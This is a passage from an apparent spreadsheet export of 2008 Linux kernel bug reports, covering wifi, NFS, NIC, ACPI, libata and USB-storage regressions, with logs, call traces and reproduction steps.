133MHz+ SCD- USC- DC=simple DMMRBC=2048 DMOST=1 DMCRS=16 RSCEM- 266MHz- 533MHz- Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data &lt;?&gt; Capabilities: [58] Message Signalled Interrupts: Mask- 64bit+ Queue=0/3 Enable- Address: efcd4ed75dbfbfbc Data: bfe3 Kernel driver in use: tg3 Kernel modules: tg3 -----------------------------------------------------------------</t>
  </si>
  <si>
    <t>iwl4965 - connection doesn't work more than 10 seconds</t>
  </si>
  <si>
    <t>2008-07-08 13:29 UTC</t>
  </si>
  <si>
    <t>2008-08-17 03:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26-rc8 Earliest failing kernel version: probably 2.6.26-rc9 Distribution: Gentoo Hardware Environment: Packard Bell easynote MB86, intel core 2 duo Software Environment: Problem Description: after a bit more than 10 seconds, there is no connection anymore between the computer and the router. When I ping my router, I don't get answer after 9 or 10 pings. However, when I run iwconfig, it reports that it's still associated. I am using WPA-PSK with CCMP encryption. I doesn't see message in the kernel logs when this problem occurs. Does anybody have any idea about this very annoying problem ? Thanks in advance. Steps to reproduce: boot the computer and ping the router. Notice that after 9 or 10 pings, there is no answer and that the wireless connection is stopped.</t>
  </si>
  <si>
    <t>vbetest fails on 2.6.26-rc9</t>
  </si>
  <si>
    <t>2008-07-08 19:46 UTC</t>
  </si>
  <si>
    <t>2008-07-13 12:50 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.x Earliest failing kernel version: 2.6.26-rcX Distribution: Hardware Environment: i386 Software Environment: Problem Description: vbetest fails due to changes to read_mem/xlate_dev_mem_ptr probably. strace excerpt: open("/dev/mem", O_RDONLY) = 3 read(3, 0, 1282) = -1 EFAULT (Bad address) xlate_dev_mem_ptr used to be a simple __va() on i386, now it calls page_is_ram which will report the first page as not ram, which in turn ends up ioremap'ing that page which also fails. of course a simple dd if=/dev/mem also fails the same way. Steps to reproduce: vbetest or 'dd if=/dev/mem'</t>
  </si>
  <si>
    <t>DEADLOOP in kernel network module</t>
  </si>
  <si>
    <t>2008-07-08 20:13 UTC</t>
  </si>
  <si>
    <t>hegang</t>
  </si>
  <si>
    <t>2008-07-10 23:33 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.16.1 Earliest failing kernel version:2.6.16.1 Distribution:FC3 Hardware Environment: Software Environment: Problem Description: We have seen a deadloop in softirq and we got the cause by creating and analysising the core dump of the kernel.I dont know where to submit a patch , so I report it here,wish you can apply it to furthur version of linux kernel. The Cause: Both ctnetlink_del_conntrack() and the tcp_packet() run the code below: if (del_timer(&amp;ct-&gt;timeout)) /*deactive the timer*/ ct-&gt;timeout.function((unsigned long) ct);/*remove conntrack from conntrack table*/ the ctnetlink_del_conntrack() context is: ................ if (cda[CTA_ID-1]) { u_int32_t id = ntohl(*(u_int32_t *)NFA_DATA(cda[CTA_ID-1])); if (ct-&gt;id != id) { ip_conntrack_put(ct); return -ENOENT; } } * if (del_timer(&amp;ct-&gt;timeout)) * ct-&gt;timeout.function((unsigned long)ct); ip_conntrack_put(ct); ........... the tcp_packet() context is: ........... case TCP_CONNTRACK_SYN_SENT: if (old_state &lt; TCP_CONNTRACK_TIME_WAIT) break; if ((conntrack-&gt;proto.tcp.seen[dir].flags &amp; IP_CT_TCP_FLAG_CLOSE_INIT) || after(ntohl(th-&gt;seq), conntrack-&gt;proto.tcp.seen[dir].td_end)) { /* Attempt to reopen a closed connection. * Delete this connection and look up again. */ write_unlock_bh(&amp;tcp_lock); * if (del_timer(&amp;conntrack-&gt;timeout)) * conntrack-&gt;timeout.function((unsigned long) * conntrack); return -NF_REPEAT; ...... How the DEADLOOP happened? (1)in ctnetlink_del_conntrack()(runs in system call context): the del_timer is called and then goes to timeout.function. (2)before timeout.function finish excution(means the conntrack not removed),an interrupt happens and a SYN packet of the same conntrack comes.CPU goes to irq handle and enventually runs tcp_packet(). (3)in tcp_packet() ,del_timer() will fail because the timer was already deleted. the timeout.function in tcp_packet will not run, -NF_REPEAT is returned, the SYN packet will be passed back again. (4)Neither side has the chance to run timeout.function,the conntrack remains there,deadloop happen,the SYN packet will be passed back again and again. The fix maybe,add lock the softirq when doing conntrack removing: +++ local_bh_disable(); if (del_timer(&amp;ct-&gt;timeout)) /*deactive the timer*/ ct-&gt;timeout.function((unsigned long) ct);/*remove conntrack from conntrack table*/ +++ local_bh_enable(); Thanks, may this be helpful. My email: hemao77@gmail.com It is hard to reproduce , but it really happen on our linux box.</t>
  </si>
  <si>
    <t>Config category "Processor type and features" absent</t>
  </si>
  <si>
    <t>2008-07-09 01:23 UTC</t>
  </si>
  <si>
    <t>linux0</t>
  </si>
  <si>
    <t>2008-07-22 08:45 UTC</t>
  </si>
  <si>
    <t>On x86, this problem can be reproduced by giving ARCH=sparc64 as a parameter to 'make'. as in: make ARCH=sparc64 xconfig Distribution: Debian Etch (4) Hardware Environment: Ultra 80 TI UltraSparc II (BlackBird) Software Environment: gcc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21) libc6 2.3.6.dsl-13 Problem Description: when doing make ARCH=sparc64 xconfig Configuration category "Processor type and features" is absent and all items which would be it's contents appear at the top level. Steps to reproduce: make ARCH=sparc64 xconfig or make ARCH=sparc64 menuconfig specifying ARCH is not necessary when actually on a SPARC.</t>
  </si>
  <si>
    <t>NFS mounts dropped</t>
  </si>
  <si>
    <t>2008-07-09 09:08 UTC</t>
  </si>
  <si>
    <t>Ryan Richter</t>
  </si>
  <si>
    <t>2010-01-19 19:35 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.6? (2.6.23.16 was fine) Earliest failing kernel version: 2.6.25.10 Distribution: Debian Etch Hardware Environment: x86 Software Environment: Linux 2.6.25.10, NFSv3 Problem Description: This is the same NFS server and clients described in bug #8467, the NFS mount options are still the same as described there. The clients boot from USB flash drives and then pivot_root onto the readonly NFS root FS. Since upgrading the server and clients to 2.6.25.10, we occasionally see the clients suddenly lose NFS connectivity, without a loss of the network connection. I see a message like this on our syslog server: graciano kernel: nfs: server xarello not responding, still trying And then graciano locks up unable to access its root FS, and never recovers. rpcinfo doesn't show anything unusual: $ rpcinfo -p graciano program vers proto port 100000 2 tcp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 622 status 100024 1 tcp 625 status 100021 1 tcp 53873 nlockmgr 100021 3 tcp 53873 nlockmgr 100021 4 tcp 53873 nlockmgr Compare another client not experiencing the problem: $ rpcinfo -p jacquere program vers proto port 100000 2 tcp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 630 status 100024 1 tcp 633 status 100021 1 tcp 50415 nlockmgr 100021 3 tcp 50415 nlockmgr 100021 4 tcp 50415 nlockmgr And I can still reboot the machine remotely via ssh by invoking the reboot binary on the flash boot drive. I never saw this under 2.6.23.16 and earlier kernel versions. We upgraded from that version to 2.6.25.6 and then to 2.6.25.10. This problem never occurred as far as I know under 2.6.25.6, but I can't say for sure that that version is OK since we only used it for a short time. Steps to reproduce: unknown, it has happened twice so far, seemingly at random.</t>
  </si>
  <si>
    <t>r8169 works bad w/ 8168B NIC</t>
  </si>
  <si>
    <t>2008-07-09 10:21 UTC</t>
  </si>
  <si>
    <t>Andrew Kirilenko</t>
  </si>
  <si>
    <t>2008-10-11 10:22 UTC</t>
  </si>
  <si>
    <t>I'm having problems with NIC on my new box. If I'm turning all two NICs in BIOS - no chances (made about 20 reboots) that even one will work. If I'm turning only one on - it sometimes works (4 times for 20 reboots). Actually, it always comes on, but no traffic go through it. I have applied http://userweb.kernel.org/~romieu/r8169/2.6.26-rc6/20080701-r8169-test.patch which changed nothing - no one successfull boot w/ two NICs turned on and 5 successful boots per 20 reboots w/ only one NIC turned on. I'll attach all possible info in one tarball (too much to copypaste here). There are two dirs (working and nonworking) with dmesg, ifconfig and interrupts and some common info (like kernel config, lshw, lspci which is common for both). Also, rmmod r8169 &amp;&amp; modprobe r8169 produces strange output in dmesg which is attched as rmmod-modprobe-result. If it'll be necessary, I'll provide any other info required, will apply &amp; test any patches provided and can discuss the problem via jabber.</t>
  </si>
  <si>
    <t>lack of GNU_STACK header doesn't result in rwx stack on i386</t>
  </si>
  <si>
    <t>2008-07-09 12:13 UTC</t>
  </si>
  <si>
    <t>2008-07-10 23:31 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown, probably before the introduction of unlimited argv Earliest failing kernel version: unknown, probably after the introduction of unlimited argv, 2.6.26-rc9 definitely fails Distribution: Hardware Environment: Software Environment: Problem Description: ELF/i386 traditionally has an executable stack which in the PT_GNU_STACK world is provided two ways: if the ELF has a RWE PT_GNU_STACK program header or if it lacks that program header. due to this regression, the latter case results in a non-executable stack with corresponding breakage of (old) userland binaries that use nested function trampolines. this bug was probably introduced when the unlimited argv feature was merged: in that system the stack vma (and its vm_flags) is initialized too early, before the incoming process' ELF header is consulted, which on i386 means that the personality used for determining the executable status of the stack is that of the old process, not the incoming one. later, in setup_arg_pages, only the explicit setting (disable/enable) of stack executability is honoured, EXSTACK_DEFAULT isn't consulted (i guess the assumption was that the initial -&gt;vm_flags setting got it right). Steps to reproduce: run any ELF that lacks a PT_GNU_STACK program header and check its stack vma, it'll be rw-, instead of rwx.</t>
  </si>
  <si>
    <t>resume failure on thinkpad x61s</t>
  </si>
  <si>
    <t>2.6.26-rc9</t>
  </si>
  <si>
    <t>2008-07-09 13:24 UTC</t>
  </si>
  <si>
    <t>2008-07-17 01:16 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26-rc8 Earliest failing kernel version: 2.6.26-rc9 Distribution: Debian Lenny Hardware Environment: Thinkpad x61s Software Environment: xserver-xorg-video-intel 2:2.3.2-2 linux-image-2.6.26-rc9-amd64 2.6.26~rc9-1~experimental.1~snapshot.11810 Problem Description: On wake up short blinking of the leds, but moon stays on and display is frozen Steps to reproduce: echo mem &gt; /sys/power/state Non longer resumes, haven't had time for git cherry-pick, will do tomorrow. resume previously crashed xorg every tenth time, but now it always reliably freezes.</t>
  </si>
  <si>
    <t>WARNING: at drivers/ata/libata-sff.c:1321 ata_sff_hsm_move+0x8f/0x661()</t>
  </si>
  <si>
    <t>2008-07-09 19:36 UTC</t>
  </si>
  <si>
    <t>Greg Fitzgerald</t>
  </si>
  <si>
    <t>2009-03-23 09:51 UTC</t>
  </si>
  <si>
    <t>I pasted the error I been seeing lately. I been getting this over the last few days. Hope this is filed in the right place, let me know if I can provide some more info. I'll see this a bunch of times in dmesg, eventually things start to slow down till my box will hard lock on me. Really don't think its a bad drive or cable considering two drives are acting up at the same time. I also tried 2.6.26-rc9-git5. As well as 2.6.25.10. ------------[ cut here ]------------ WARNING: at drivers/ata/libata-sff.c:1321 ata_sff_hsm_move+0x8f/0x661() Modules linked in: 3c59x mii i2c_i801 Pid: 0, comm: swapper Tainted: P W 2.6.26-rc9-git5 #3 Call Trace: &lt;IRQ&gt; [&lt;ffffffff8023438a&gt;] warn_on_slowpath+0x51/0x6d [&lt;ffffffff802274ec&gt;] enqueue_task+0x4d/0x5b [&lt;ffffffff8022a23b&gt;] __resched_task+0x4b/0x77 [&lt;ffffffff805f3b0a&gt;] _spin_unlock_irqrestore+0x12/0x32 [&lt;ffffffff8022a05b&gt;] try_to_wake_up+0x8d/0x1f7 [&lt;ffffffff8048e23c&gt;] ata_sff_hsm_move+0x8f/0x661 [&lt;ffffffff8023df26&gt;] lock_timer_base+0x26/0x4e [&lt;ffffffff805f3b0a&gt;] _spin_unlock_irqrestore+0x12/0x32 [&lt;ffffffff8048f718&gt;] ata_sff_interrupt+0x16c/0x224 [&lt;ffffffff805f3b3b&gt;] _spin_unlock_irq+0x11/0x31 [&lt;ffffffff8026bc42&gt;] handle_IRQ_event+0x32/0x62 [&lt;ffffffff8026d0f7&gt;] handle_fasteoi_irq+0x7f/0xea [&lt;ffffffff8020dec6&gt;] do_IRQ+0xb6/0x18c [&lt;ffffffff80211478&gt;] mwait_idle+0x0/0x48 [&lt;ffffffff8020b851&gt;] ret_from_intr+0x0/0xa &lt;EOI&gt; [&lt;ffffffff80219915&gt;] lapic_next_event+0x0/0xa [&lt;ffffffff802114b9&gt;] mwait_idle+0x41/0x48 [&lt;ffffffff8020a063&gt;] cpu_idle+0x4a/0x85 ---[ end trace b43c66638fc6f3d5 ]--- ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x6 ata2.00: BMDMA stat 0x66 ata2.00: cmd 35/00:f0:7d:e9:5c/00:01:03:00:00/e0 tag 0 dma 253952 out res 51/84:a0:cd:e9:5c/84:01:03:00:00/e0 Emask 0x30 (host bus error) ata2.00: status: { DRDY ERR } ata2.00: error: { ICRC ABRT } ata2: soft resetting link ata2.00: configured for UDMA/133 ata2.01: configured for UDMA/133 ata2: EH complete sd 1:0:0:0: [sda] 488397168 512-byte hardware sectors (250059 MB) sd 1:0:0:0: [sda] Write Protect is off sd 1:0:0:0: [sda] Mode Sense: 00 3a 00 00 sd 1:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA sd 1:0:1:0: [sdb] 625142448 512-byte hardware sectors (320073 MB) sd 1:0:1:0: [sdb] Write Protect is off sd 1:0:1:0: [sdb] Mode Sense: 00 3a 00 00 sd 1:0:1:0: [sdb] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA</t>
  </si>
  <si>
    <t>LATEST-IS-2.6.25.* still points to .9</t>
  </si>
  <si>
    <t>2008-07-10 11:51 UTC</t>
  </si>
  <si>
    <t>2008-07-11 00:10 UTC</t>
  </si>
  <si>
    <t>It is a whole week since the release now - please rename this file.</t>
  </si>
  <si>
    <t>scsi-layer crash after usb storage device unplug</t>
  </si>
  <si>
    <t>2.6.26-rc9-wl-12766-ga0b2a63-dirty</t>
  </si>
  <si>
    <t>2008-07-12 01:50 UTC</t>
  </si>
  <si>
    <t>2008-09-23 16:34 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: no idea, never saw this problem before with the same device, but the memory card is new Earliest failing kernel version: no idea either, current kernel is 2.6.26-rc9-wl-12766-ga0b2a63-dirty Distribution: debian/unstable Hardware Environment: powerbook 5,6 Software Environment: Problem Description: SDHC card in USB reader wasn't responding, so I unplugged and got a null pointer deref Steps to reproduce: I have no idea if I can reproduce this. What I was doing is that I was trying to access an SDHC card in what is probably just an SD card reader, and the device wasn't responding. I tried this a few times, unplugging and re-plugging with card in it and hot-plugging the card instead of the reader. At the last attempt, I let it sit there for a while until it gave up (you can see that in the log below, look at the timestamps) and then unplugged it. [33118.974296] usb 2-2: new high speed USB device using ehci_hcd and address 12 [33119.128004] PM: Adding info for usb:2-2 [33119.149666] usb 2-2: configuration #1 chosen from 1 choice [33119.150212] PM: Adding info for usb:2-2:1.0 [33119.164343] scsi9 : SCSI emulation for USB Mass Storage devices [33119.164963] PM: Adding info for scsi:host9 [33119.165151] PM: Adding info for No Bus:host9 [33119.179385] PM: Adding info for No Bus:usbdev2.12_ep01 [33119.179584] PM: Adding info for No Bus:usbdev2.12_ep82 [33119.179752] PM: Adding info for No Bus:usbdev2.12 [33119.179993] PM: Adding info for No Bus:usbdev2.12_ep00 [33119.180102] usb 2-2: New USB device found, idVendor=058f, idProduct=6362 [33119.180112] usb 2-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [33119.180120] usb 2-2: Product: Mass Storage Device [33119.180125] usb 2-2: Manufacturer: Generic [33119.180130] usb 2-2: SerialNumber: 058F312D81B [33119.182913] usb-storage: device found at 12 [33119.182923] usb-storage: waiting for device to settle before scanning [33124.175752] scsi 9:0:0:0: Direct-Access Generic USB SD Reader 1.00 PQ: 0 ANSI: 0 [33124.175817] PM: Adding info for scsi:target9:0:0 [33124.184591] PM: Adding info for scsi:9:0:0:0 [33124.184798] PM: Adding info for No Bus:9:0:0:0 [33154.304287] usb 2-2: reset high speed USB device using ehci_hcd and address 12 [33164.574363] usb 2-2: reset high speed USB device using ehci_hcd and address 12 [33178.804363] sd 9:0:0:0: Device offlined - not ready after error recovery [33178.804448] sd 9:0:0:0: rejecting I/O to offline device [33178.804490] sd 9:0:0:0: rejecting I/O to offline device [33178.804522] sd 9:0:0:0: rejecting I/O to offline device [33178.804543] sd 9:0:0:0: [sda] READ CAPACITY failed [33178.804548] sd 9:0:0:0: [sda] Result: hostbyte=0x01 driverbyte=0x00 [33178.804558] sd 9:0:0:0: [sda] Sense not available. [33178.804578] sd 9:0:0:0: rejecting I/O to offline device [33178.804599] sd 9:0:0:0: [sda] Write Protect is off [33178.804605] sd 9:0:0:0: [sda] Mode Sense: 00 00 00 00 [33178.804611] sd 9:0:0:0: [sda] Assuming drive cache: write through [33178.804719] PM: Adding info for No Bus:sda [33178.805011] PM: Adding info for No Bus:8:0 [33178.805147] sd 9:0:0:0: [sda] Attached SCSI removable disk [33178.805197] PM: Adding info for No Bus:9:0:0:0 [33178.805358] PM: Adding info for No Bus:9:0:0:0 [33178.914595] usb 2-2: USB disconnect, address 12 [33178.915152] PM: Removing info for usb:2-2:1.0 [33178.916008] Unable to handle kernel paging request for data at address 0x00000004 [33178.916023] Faulting instruction address: 0xf283185c [33178.916038] Oops: Kernel access of bad area, sig: 11 [#1] [33178.916043] PREEMPT PowerMac [33178.916050] Modules linked in: nls_iso8859_15 nls_cp850 vfat fat sd_mod usb_storage scsi_mod af_packet b43 mac80211 cfg80211 binfmt_misc radeon drm hci_usb rfcomm l2cap bluetooth nls_utf8 hfsplus nls_base fuse dm_snapshot dm_mirror dm_log sha256_generic joydev appletouch arc4 usbhid snd_aoa_codec_tas snd_aoa_fabric_layout snd_aoa evdev snd_aoa_i2sbus snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd_page_alloc snd soundcore ohci1394 snd_aoa_soundbus ieee1394 ehci_hcd ohci_hcd usbcore ssb pcmcia yenta_socket rsrc_nonstatic pcmcia_core firmware_class uninorth_agp agpgart unix [last unloaded: cfg80211] [33178.916180] NIP: f283185c LR: f262b594 CTR: f2831820 [33178.916187] REGS: c5cebcf0 TRAP: 0300 Not tainted (2.6.26-rc9-wl-12766-ga0b2a63-dirty) [33178.916194] MSR: 00009032 &lt;EE,ME,IR,DR&gt; CR: 28002028 XER: 20000000 [33178.916212] DAR: 00000004, DSISR: 40000000 [33178.916218] TASK = ecc4dca0[685] 'usb-stor-scan' THREAD: c5cea000 [33178.916224] GPR00: 00000008 c5cebda0 ecc4dca0 ef9a24c0 00009032 eec528f0 c5df0008 fffffffd [33178.916244] GPR08: fffffffc c5df25b8 c03bbdcc 00000000 28002022 00000000 017b7584 017b72f8 [33178.916264] GPR16: 41400000 00240e64 00000000 00000001 c0631d1c ef86ffac eec528f0 00000000 [33178.916283] GPR24: c0047a10 00000000 f2630058 eec528f0 c5d44b08 eec52d24 c5d44af0 c5df29e0 [33178.916305] NIP [f283185c] slave_alloc+0x3c/0x84 [usb_storage] [33178.916343] LR [f262b594] scsi_alloc_sdev+0x194/0x210 [scsi_mod] [33178.916404] Call Trace: [33178.916409] [c5cebdc0] [f262b594] scsi_alloc_sdev+0x194/0x210 [scsi_mod] [33178.916436] [c5cebdf0] [f262ba10] scsi_probe_and_add_lun+0x24c/0x9a0 [scsi_mod] [33178.916462] [c5cebe80] [f262c4d8] __scsi_scan_target+0xf4/0x5cc [scsi_mod] [33178.916488] [c5cebf30] [f262ca18] scsi_scan_channel+0x68/0xa4 [scsi_mod] [33178.916515] [c5cebf50] [f262cb18] scsi_scan_host_selected+0xc4/0x144 [scsi_mod] [33178.916541] [c5cebf80] [f2833f08] usb_stor_scan_thread+0x14c/0x190 [usb_storage] [33178.916562] [c5cebfd0] [c0047a60] kthread+0x50/0x88 [33178.916576] [c5cebff0] [c0012500] kernel_thread+0x44/0x60 [33178.916593] Instruction dump: [33178.916600] 7c7f1b78 90010024 38000024 98030067 83a30000 80630004 3bbd0434 801d003c [33178.916620] 813d0028 54009eba 7d290214 816901fc &lt;a00b0004&gt; 5404c23e 5004442e 5484043e [33178.916700] ---[ end trace 9617137d6c0f182d ]---</t>
  </si>
  <si>
    <t>INFO: recursive lock - when I press SysRQ+powerOff</t>
  </si>
  <si>
    <t>2008-07-16 05:38 UTC</t>
  </si>
  <si>
    <t>Oleg Nesterov</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: not really sure - but it used to work in some previous -rcX - though I'm not pressing/checking this key frequently Distribution: Debian Unstable Hardware Environment: T61, 2GB, C2D x86_64 Software Environment: Debian Unstable (32bit installation) Problem Description: INFO: possible recursive locking detected during cleanup_workqueue_thread - see the attached image for camera snapshot Steps to reproduce: SysRQ S + U + O (B for me for unknown reason doesn't work) I'm not sure in which Component this bugs belongs - thus leaving to other_other maintainer to pass it to the right place</t>
  </si>
  <si>
    <t>Section mismatches in 2.6.26</t>
  </si>
  <si>
    <t>2008-07-16 09:19 UTC</t>
  </si>
  <si>
    <t>Tilman Sauerbeck</t>
  </si>
  <si>
    <t>2009-01-25 23:05 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.10 Earliest failing kernel version: 2.6.26 Building 2.6.26, I'm seeing the following section mismatch warnings: WARNING: vmlinux.o(.text+0x169a2): Section mismatch in reference from the function arch_setup_additional_pages() to the variable .init.data:vdso_start The function arch_setup_additional_pages() references the variable __initdata vdso_start. This is often because arch_setup_additional_pages lacks a __initdata annotation or the annotation of vdso_start is wrong. WARNING: vmlinux.o(.text+0x169a9): Section mismatch in reference from the function arch_setup_additional_pages() to the variable .init.data:vdso_end The function arch_setup_additional_pages() references the variable __initdata vdso_end. This is often because arch_setup_additional_pages lacks a __initdata annotation or the annotation of vdso_end is wrong. WARNING: vmlinux.o(.cpuinit.text+0x3c3b): Section mismatch in reference from the function uv_cpu_init() to the function .init.text:uv_system_init() The function __cpuinit uv_cpu_init() references a function __init uv_system_init(). If uv_system_init is only used by uv_cpu_init then annotate uv_system_init with a matching annotation.</t>
  </si>
  <si>
    <t>complete system hang (not even sysrq-works) with via-velocity</t>
  </si>
  <si>
    <t>2008-07-16 09:20 UTC</t>
  </si>
  <si>
    <t>2010-01-19 19:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22.18 Earliest failing kernel version: 2.6.25.9 Distribution: openSUSE 11.0 Hardware Environment: AMD Athlon XP 2200 Software Environment: Problem Description: Sending as little as 1GB across the wire at best speed causes a flood of messages and eventually a complete hang. Total time to hang: under 30 seconds. I used a simple program to send 1GB of data via TCP port 2000 to the host 'frank'. In less than 30 seconds 'frank' hangs completely - keyboard inoperative, etc... and I even tried the magic sysrq without luck. Contents of /var/log/messages attached.</t>
  </si>
  <si>
    <t>Regression: Freeze during boot on MSI M673 laptop</t>
  </si>
  <si>
    <t>2008-07-16 09:33 UTC</t>
  </si>
  <si>
    <t>Dmitry Nezhevenko</t>
  </si>
  <si>
    <t>2008-09-16 11:36 UTC</t>
  </si>
  <si>
    <t>Glauber Costa</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.6 Distribution: Debian unstable Hardware Environment: MSI M673 laptop, i386 Hi. I've just compiled 2.6.26 vanilla kernel. During booting it just freeze after detecting my SATA devices. However after pressing some button (e.g. space, enter, anything) it continue boot for a while (1-2 seconds) and then freeze again. Finally I've booted it (with pressed enter button). I've tried followed kernel parameters with no success: 1. noapic 2. pci=nommconfig 3. noacpi 4. acpi_processor.max_cstate=1 Passing acpi=off to kernel helps. It boots without freeze, however there are no PM features. Currently my 'main' kernel is 2.6.25.6 which works great (including s2ram, s2disk using TuxOnIce). I'm attaching dmesg, lspci, lsmod and some other info.</t>
  </si>
  <si>
    <t>Can't use framebuffer or vesa Xorg with two memory modules</t>
  </si>
  <si>
    <t>2.6.27rc8</t>
  </si>
  <si>
    <t>2008-07-16 14:47 UTC</t>
  </si>
  <si>
    <t>Yannick Roehlly</t>
  </si>
  <si>
    <t>2010-05-19 21:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.25 Distribution: Debian Sid Hardware Environment: Asus M51Se laptop, T8300, ATI Radeon HD3470 Problem Description: I've got an Asus M51Se laptop. If I boot with only one 2Go memory module, everything is fine. I can boot with the kernel framebuffer console and I can launch Xorg using the vesa driver. But if I boot with two modules (2Go+2Go or 2Go+1Go) I can't use neither the framebuffer console (the screen remains black even if the machine boots) nor the vesa driver (the screen is "scrambled"). Early in the boot process, when booting with two modules I have this error: [ 0.292314] PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report [ 0.292317] PCI: Cannot allocate resource region 9 of bridge 0000:00:01.0 [ 0.292387] PCI: Cannot allocate resource region 0 of device 0000:01:00.0 [ 0.354395] PCI: Failed to allocate mem resource #9:10000000@0 for 0000:00:01.0 [ 0.354441] PCI: Failed to allocate mem resource #0:10000000@0 for 0000:01:00.0 where device 0000:01:00.0 is the graphic card. I've tested the "pci=routeirq" but without success. I've tested both 64bits and 32bits kernels (on corresponding distributions). What makes me suspect a kernel problem is that using Freebsd (with Freesbee livecd) the vesa Xorg driver works. Note also that when using two modules, the Bios uses them in dual-channel mode (I can't change that). As I'm not used to bug reporting about the kernel, there must be a lot of information missing. Feel free to ask what information you need, I'll plug a second memory module to bring them to you. Sincerely, Yannick PS: I filled this bug under "memory management" but I'm not sure it's the correct place.</t>
  </si>
  <si>
    <t>iwlwifi: printk flood in ad-hoc mode + WEP</t>
  </si>
  <si>
    <t>2008-07-16 15:05 UTC</t>
  </si>
  <si>
    <t>2015-11-22 07:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.4 Earliest failing kernel version: 2.6.26 Distribution: Debian Sid Hardware Environment: Fujitsu-Siemens Lifebook E8110, T2400, IWL3945 Software Environment: Gnome 2.22 Problem Description: After configuring the interface to Ad-hoc mode and WEP, when the remote station tries to connect, the dmesg gets flooded by iwlwifi, and shortly afterwards the remote client disconnects. Steps to reproduce: /sbin/iwconfig $WIFI mode ad-hoc /sbin/iwconfig $WIFI essid $SSID channel 3 /sbin/iwconfig $WIFI key s:$PASS</t>
  </si>
  <si>
    <t>an index reference is returned instead of an integer when evaluating _BQC - FSC Amilo Pi 2515</t>
  </si>
  <si>
    <t>2008-10-24 22:55 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: FSC Amilo Pi 2515 Software Environment: x86_64 Problem Description: After certain events, e.g. display off, switch desktop modes via xrand, resume from hibernate and on start monitor brightness drops to minimum (or sometimes raises to maximum). I get following dmesg output after such events (after this one the brightness minimizes): ACPI Error (utobject-0502): Unsupported Reference opcode=88 in object ffff81007ea75XX0 [20070126] and this happens before the brightness maximizes: ACPI Error (utobject-0502): Unsupported Reference opcode=88 in object ffff81007eb14XX0 [20070126] XX change each time. The kernel has opregion patch from http://bugzilla.kernel.org/show_bug.cgi?id=9995 applied and I boot with acpi_osi="!Windows 2006" as a workaround to make brightness keys work as described in http://bugzilla.kernel.org/show_bug.cgi?id=9902 This might be a BIOS bug, but I thought I'll report it nonetheless just in case it isn't :) Steps to reproduce:turn the display on/off or switch modes.</t>
  </si>
  <si>
    <t>reboot=bios is mandatory on Dell T5400 server.</t>
  </si>
  <si>
    <t>2.6.24-19-generic #1 SMP</t>
  </si>
  <si>
    <t>2008-07-17 04:43 UTC</t>
  </si>
  <si>
    <t>Yannick H.</t>
  </si>
  <si>
    <t>2009-03-19 22:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - none - Earliest failing kernel version: Distribution: "Ubuntu 8.04.1" Hardware Environment: from dmidecode ================= Handle 0x0100, DMI type 1, 27 bytes System Information Manufacturer: Dell Inc. Product Name: Precision WorkStation T5400 Version: Not Specified ================= Software Environment: Problem Description: to be enable to reboot a T5400 platform without any freeze at reboot time, you need to set the "reboot=bios" option to the kernel. This platform is to be add to the exception list of the arch/x86/kernel/reboot_32.c Steps to reproduce:</t>
  </si>
  <si>
    <t>LATEST-IS-* outdated, duplicate</t>
  </si>
  <si>
    <t>2008-07-18 11:18 UTC</t>
  </si>
  <si>
    <t>2008-07-25 00:03 UTC</t>
  </si>
  <si>
    <t>There are two pub/linux/kernel/v2.6/LATEST-IS-* files, one of which is outdated</t>
  </si>
  <si>
    <t>iRiver T10 is incorrectly handled because of commit bdb2b8ca</t>
  </si>
  <si>
    <t>2008-07-19 12:39 UTC</t>
  </si>
  <si>
    <t>Andrey Rahmatullin</t>
  </si>
  <si>
    <t>2008-09-21 15:56 UTC</t>
  </si>
  <si>
    <t>iRiver T10 mp3 player, which is basically an USB mass storage, isn't working anymore: usb 5-1: new high speed USB device using ehci_hcd and address 5 usb 5-1: configuration #1 chosen from 1 choice usb 5-1: New USB device found, idVendor=4102, idProduct=1020 usb 5-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 usb 5-1: Product: iriver MP3 T10 usb 5-1: Manufacturer: iriver Limited usbcore: registered new interface driver libusual Initializing USB Mass Storage driver... scsi4 : SCSI emulation for USB Mass Storage devices usbcore: registered new interface driver usb-storage USB Mass Storage support registered. usb-storage: device found at 5 usb-storage: waiting for device to settle before scanning scsi scan: INQUIRY result too short (5), using 36 scsi 4:0:0:0: Direct-Access PQ: 0 ANSI: 0 sd 4:0:0:0: [sdc] Sector size 0 reported, assuming 512. sd 4:0:0:0: [sdc] 1 512-byte hardware sectors (0 MB) sd 4:0:0:0: [sdc] Write Protect is off sd 4:0:0:0: [sdc] Mode Sense: 03 00 00 00 sd 4:0:0:0: [sdc] Assuming drive cache: write through sd 4:0:0:0: [sdc] Sector size 0 reported, assuming 512. sd 4:0:0:0: [sdc] 1 512-byte hardware sectors (0 MB) sd 